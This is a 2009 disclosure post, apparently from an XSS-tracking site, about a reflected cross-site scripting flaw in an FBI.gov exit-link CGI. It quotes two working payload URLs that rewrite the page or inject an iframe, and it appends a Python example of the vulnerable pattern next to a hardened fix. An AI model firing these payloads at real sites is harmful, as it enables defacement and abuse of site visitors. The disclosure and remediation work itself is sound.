FBI.gov xssed!
Written by Kevin Fernandez
Friday, 9 January 2009
OK, it is not the first time, but they had fixed them all. This will probably be the third or fourth time they try to address this damn CGI! Here is the XSS that Babaconda submitted to us (works only in Internet Explorer):
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'babaconda'</script>
For the iframe fans, here's one:
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.fbi.gov/</script><script/defer>document.body.innerHTML='<iframe/src=http://xssed.com>'</script>
Here is the mirror:
http://www.xssed.com/mirror/46852/
Have a look at the previous XSS vulnerabilities affecting *.fbi.gov:
http://www.xssed.com/archive/domain=fbi.gov
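
Both submitted URLs begin their payload with </script>, which suggests that outside.cgi copies the query string into an inline script on the exit page. The block below is an added example, not code from FBI.gov or from this post: it shows that assumed pattern next to a hardened rendering that validates the destination and encodes it for each output context. All function names and the page markup are hypothetical.

```python
import html
import json
from urllib.parse import urlsplit

# Constructed sample: the query string of the first URL above, as a CGI would receive it.
SAMPLE_QUERY = ("http://www.google.com/</script><script/defer>"
                "document.body.innerHTML='xssed'+unescape('%20')+'by'"
                "+unescape('%20')+'babaconda'</script>")


def render_vulnerable(dest):
    # Assumed flaw: the raw query string is pasted into an inline script,
    # so a literal </script> in it ends the block and starts attacker markup.
    return '<script>var dest = "' + dest + '";</script>'


def is_safe_destination(dest):
    """Accept only absolute http(s) URLs without markup, quotes or whitespace."""
    if any(c in '<>"\'`\\' or ord(c) < 0x21 or ord(c) == 0x7F for c in dest):
        return False
    try:
        parts = urlsplit(dest)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def js_string(value):
    """JSON-encode, then escape the characters the HTML parser reacts to
    inside a <script> element, so the value can never close the block."""
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out


def render_hardened(dest):
    # Reject instead of reflecting: the caller answers 400 when this is None.
    if not is_safe_destination(dest):
        return None
    link = html.escape(dest, quote=True)  # HTML attribute and text context
    return ('<p>You are leaving this site for <a href="%s">%s</a>.</p>\n'
            '<script>var dest = %s;</script>' % (link, link, js_string(dest)))
```

Validation and encoding are applied together on purpose: the allow-list stops non-http(s) schemes such as javascript:, and the context-specific encoding keeps the page safe even if the allow-list is later relaxed.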